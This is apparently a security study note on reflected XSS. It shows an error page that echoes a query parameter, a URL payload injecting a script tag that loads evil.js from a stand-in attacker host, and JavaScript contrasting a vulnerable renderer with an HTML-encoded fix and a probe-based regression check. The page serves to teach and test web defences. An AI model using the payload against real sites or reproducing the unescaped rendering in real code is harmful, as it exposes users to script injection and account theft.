
Reflected XSS

Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.

#exploitation#web#xss

Example Scenario:

Consider a website that displays an error message when you enter incorrect input. The content of the error message is taken from the error parameter in the query string and built directly into the page source.


```
https://website.thm/?error=invalid input detected
```

```html
<div class="alert alert-danger">
	<p>Invalid input detected</p>
</div>
```


The application doesn't check the contents of the error parameter, which allows the attacker to insert malicious code. 

```
https://website.thm/?error=<script src="https://attacker.thm/evil.js"></script>
```

```html
<div class="alert alert-danger">
	<p><script src="https://attacker.thm/evil.js"></script></p>
</div>
```

How to test for Reflected XSS:

You'll need to test every possible point of entry; these include:

  • Parameters in the URL Query String 
  • URL File Path 
  • Sometimes HTTP Headers (although unlikely to be exploitable in practice)
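
The error page from the scenario, as an added example that is not code from the original tutorial: the same markup rendered with and without output encoding, plus a regression check that sends a harmless marker through the `error` parameter to see whether it comes back as markup. The function names and the probe string are assumptions made for the illustration.

```javascript
// Added example; function names and the probe string are hypothetical.

// Vulnerable: the `error` query parameter is concatenated into the markup as-is.
function renderErrorVulnerable(requestUrl) {
  const error = new URL(requestUrl).searchParams.get("error") ?? "";
  return `<div class="alert alert-danger">\n\t<p>${error}</p>\n</div>`;
}

// HTML-encode the characters that can change parsing in element content
// and in quoted attribute values.
function escapeHtml(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Fixed: same page, but the value is encoded for the HTML context before output.
function renderErrorSafe(requestUrl) {
  const error = new URL(requestUrl).searchParams.get("error") ?? "";
  return `<div class="alert alert-danger">\n\t<p>${escapeHtml(error)}</p>\n</div>`;
}

// Regression check: pass a harmless marker tag through a renderer and report
// whether it comes back as live markup (true = reflected without encoding).
function reflectsRawMarkup(render) {
  const probe = "<xss-probe-7f3a>"; // constructed marker, inert if rendered
  const url = "https://website.thm/?error=" + encodeURIComponent(probe);
  return render(url).includes(probe);
}

// Request URLs modelled on the two in the scenario.
const benign = "https://website.thm/?error=Invalid input detected";
const injected = "https://website.thm/?error=" +
  encodeURIComponent('<script src="https://attacker.thm/evil.js"></script>');

console.log(renderErrorSafe(benign));          // normal error message, unchanged
console.log(renderErrorVulnerable(injected));  // script element reaches the page
console.log(renderErrorSafe(injected));        // payload shown as text: &lt;script ...
console.log(reflectsRawMarkup(renderErrorVulnerable)); // true
console.log(reflectsRawMarkup(renderErrorSafe));       // false
```

The same check can be pointed at any handler that builds a page from the URL file path or a header value, the other entry points listed above.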